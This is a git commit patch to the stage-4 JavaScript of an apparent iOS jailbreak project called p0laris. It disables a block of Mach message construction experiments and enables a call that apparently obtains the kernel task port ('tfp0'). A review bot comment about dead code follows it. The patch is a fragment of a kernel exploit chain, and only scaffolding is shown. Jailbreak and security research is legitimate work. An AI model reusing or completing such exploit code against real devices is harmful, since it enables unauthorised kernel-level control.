From 0df8ea8b4bb9d9ee9d45a56eb5df2c2c6a23127c Mon Sep 17 00:00:00 2001
From: spv420
Date: Mon, 1 Aug 2022 01:10:25 -0400
Subject: native_ptr w00t

---
 src/stage4/main.js | 132 +++++++++++++++++++++++++++--------------------------
 1 file changed, 67 insertions(+), 65 deletions(-)
(limited to 'src/stage4/main.js')

diff --git a/src/stage4/main.js b/src/stage4/main.js
index 541dc44..6d14de1 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -55,74 +55,76 @@ function main() {
 sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
 prep_shit();
- var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
- var addy = init_port_set.addy;
- var init_port_set_obj = init_port_set.deref();
- init_port_set_obj.address = 0x41414141;
- init_port_set_obj.count = 0x42424242;
- init_port_set_obj.disposition = 19;
- init_port_set_obj.deallocate = false;
- init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- init_port_set.write(init_port_set_obj, 0);
- init_port_set.write(init_port_set_obj, 1);
- init_port_set.write(init_port_set_obj, 2);
- init_port_set.write(init_port_set_obj, 3);
- p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
- JSON.stringify(init_port_set.deref(1)),
- JSON.stringify(init_port_set.deref(2)),
- JSON.stringify(init_port_set.deref(3)));
-
- var Head = new mach_msg_header_t();
- var addy = Head.addy;
- var Head_obj = Head.deref();
- Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- Head_obj.msgh_remote_port = 0x41424344;
- Head_obj.msgh_local_port = 0x45464748;
- Head_obj.msgh_id = 1337;
- Head.write(Head_obj);
- p0laris_log("%s", JSON.stringify(Head.deref()));
-
- p0laris_log("here");
-
- var req = new Request_sp(4);
- p0laris_log("here");
- var addy = req.addy;
- p0laris_log("here");
- var req_obj = req.deref();
- p0laris_log("here");
-
- req_obj.msgh_body.msgh_descriptor_count = 4;
- p0laris_log("here");
- for (var i = 0; i < 4; i++) {
- req_obj.init_port_set[i].address = 0x1234;
- req_obj.init_port_set[i].count = 0x1235;
- req_obj.init_port_set[i].disposition = 19;
- req_obj.init_port_set[i].deallocate = false;
- req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
- }
-
- p0laris_log("here");
- req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
- p0laris_log("here");
- req_obj.Head.msgh_remote_port = 0x41424344;
- p0laris_log("here");
- req_obj.Head.msgh_local_port = 0x45464748;
- p0laris_log("here");
- req_obj.Head.msgh_id = 1337;
-
- p0laris_log("here");
- req.write(req_obj);
- p0laris_log("here");
- p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
- if (typeof value === 'number') {
- return "0x" + value.toString(16);
+ if (0) {
+ var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
+ var addy = init_port_set.addy;
+ var init_port_set_obj = init_port_set.deref();
+ init_port_set_obj.address = 0x41414141;
+ init_port_set_obj.count = 0x42424242;
+ init_port_set_obj.disposition = 19;
+ init_port_set_obj.deallocate = false;
+ init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+ init_port_set.write(init_port_set_obj, 0);
+ init_port_set.write(init_port_set_obj, 1);
+ init_port_set.write(init_port_set_obj, 2);
+ init_port_set.write(init_port_set_obj, 3);
+ p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
+ JSON.stringify(init_port_set.deref(1)),
+ JSON.stringify(init_port_set.deref(2)),
+ JSON.stringify(init_port_set.deref(3)));
+
+ var Head = new mach_msg_header_t();
+ var addy = Head.addy;
+ var Head_obj = Head.deref();
+ Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ Head_obj.msgh_remote_port = 0x41424344;
+ Head_obj.msgh_local_port = 0x45464748;
+ Head_obj.msgh_id = 1337;
+ Head.write(Head_obj);
+ p0laris_log("%s", JSON.stringify(Head.deref()));
+
+ p0laris_log("here");
+
+ var req = new Request_sp(4);
+ p0laris_log("here");
+ var addy = req.addy;
+ p0laris_log("here");
+ var req_obj = req.deref();
+ p0laris_log("here");
+
+ req_obj.msgh_body.msgh_descriptor_count = 4;
+ p0laris_log("here");
+ for (var i = 0; i < 4; i++) {
+ req_obj.init_port_set[i].address = 0x1234;
+ req_obj.init_port_set[i].count = 0x1235;
+ req_obj.init_port_set[i].disposition = 19;
+ req_obj.init_port_set[i].deallocate = false;
+ req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
 }
- return value;
- }, "\t"));
- p0laris_log("here");
+ p0laris_log("here");
+ req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+ p0laris_log("here");
+ req_obj.Head.msgh_remote_port = 0x41424344;
+ p0laris_log("here");
+ req_obj.Head.msgh_local_port = 0x45464748;
+ p0laris_log("here");
+ req_obj.Head.msgh_id = 1337;
+
+ p0laris_log("here");
+ req.write(req_obj);
+ p0laris_log("here");
+ p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
+ if (typeof value === 'number') {
+ return "0x" + value.toString(16);
+ }
+
+ return value;
+ }, "\t"));
+ p0laris_log("here");
+ }
-// var tfp0 = get_kernel_task();
+ var tfp0 = get_kernel_task();
 syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
 return 0;
-- 
cgit v1.2.3
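Review bot: The `if (0) { … }` wrapper keeps some sixty lines of dead code inside main() instead of deleting them; version control already preserves the experiment, so the block should be removed outright, or, if it is meant to be toggled again, gated on a named flag such as `const DUMP_MSG_LAYOUT = false;` rather than a literal `0` that no linter will flag as intentional. Inside that block `var addy` is declared three times and never read, and the repeated `p0laris_log("here")` trace calls carry no information once the path is disabled. The newly enabled `var tfp0 = get_kernel_task();` is assigned but not read anywhere in the hunk, so as far as this diff shows it is an unused local. main() begins before the hunk and its remaining body may continue outside it.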